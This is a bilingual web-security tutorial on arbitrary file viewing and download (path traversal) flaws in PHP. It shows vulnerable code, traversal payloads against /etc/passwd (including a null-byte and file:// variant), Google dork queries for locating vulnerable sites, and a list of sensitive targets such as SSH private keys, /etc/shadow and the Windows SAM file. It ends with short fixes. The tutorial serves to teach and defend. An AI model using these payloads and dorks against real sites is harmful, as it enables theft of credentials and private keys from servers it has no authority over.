Arbitrary file viewing and downloading vulnerabilities
Vulnerability introduction
Due to business needs, some websites often need to provide file viewing or file downloading functions, but if users view or download files,
Without restrictions, malicious users can view or download any sensitive files. This is the file viewing and downloading vulnerability.
Conditions of use
* There is a function to read the file
* The path to read the file is user-controllable and unverified or lax
* output file content
Vulnerability Hazard
Download any server files, such as script code, services and system configuration files, etc.
Further code audits can be performed with the obtained code to get more exploitable vulnerabilities
Read any file
The code form can be as follows:
<?php
$filename = "test.txt";
readfile($filename);
?>
<?php
$filename = "test.txt";
$fp = fopen($filename,"r") or die("Unable to open file!");
$data = fread($fp,filesize($filename));
fclose($fp);
echo $data;
?>
<?php
$filename = "test.txt";
echo file_get_contents($filename);
?>
Download any file
Download:
<a href="http://www.xx.com/a.zip">Download</a>
Download with header():
<?php
$filename = "uploads/201607141437284653.jpg";
header('Content-Type: imgage/jpeg');
header('Content-Disposition: attachment; filename='.$filename);
header('Content-Lengh: '.filesize($filename));
?>
漏洞利用代码
readfile.php?file=/etc/passwd
readfile.php?file=../../../../../../../../etc/passwd
readfile.php?file=../../../../../../../../etc/passwd%00
Google search
inurl:"readfile.php?file="
inurl:"read.php?filename="
inurl:"download.php?file="
inurl:"down.php?file="
等等...
漏洞挖掘
可以用Google hacking或Web漏洞扫描器
从链接上看,形如:
• readfile.php?file=***.txt
• download.php?file=***.rar
从参数名看,形如:
• &RealPath=
• &FilePath=
• &filepath=
• &Path=
• &path=
• &inputFile=
• &url=
• &urls=
• &Lang=
• &dis=
• &data=
• &readfile=
• &filep=
• &src=
• &menu=
• META-INF
• WEB-INF
敏感文件如下
Windows:
C:\boot.ini //查看系统版本
C:\Windows\System32\inetsrv\MetaBase.xml //IIS配置文件
C:\Windows\repair\sam //存储系统初次安装的密码
C:\Program Files\mysql\my.ini //Mysql配置
C:\Program Files\mysql\data\mysql\user.MYD //Mysql root
C:\Windows\php.ini //php配置信息
C:\Windows\my.ini //Mysql配置信息
...
Linux:
/root/.ssh/authorized_keys
/root/.ssh/id_rsa
/root/.ssh/id_ras.keystore
/root/.ssh/known_hosts
/etc/passwd
/etc/shadow
/etc/my.cnf
/etc/httpd/conf/httpd.conf
/root/.bash_history
/root/.mysql_history
/proc/self/fd/fd[0-9]*(文件标识符)
/proc/mounts
/porc/config.gz
漏洞验证
• index.php?f=../../../../../../etc/passwd
• index.php?f=../index.php
• index.php?f=file:///etc/passwd
注:当参数f的参数值为php文件时,若是文件被解析则是文件包含漏洞,
若显示源码或提示下载则是文件查看与下载漏洞
修复方案
* 过滤.(点),使用户在url中不能回溯上级目录
* 正则严格判断用户输入参数的格式
* php.ini配置open_basedir限定文件访问范围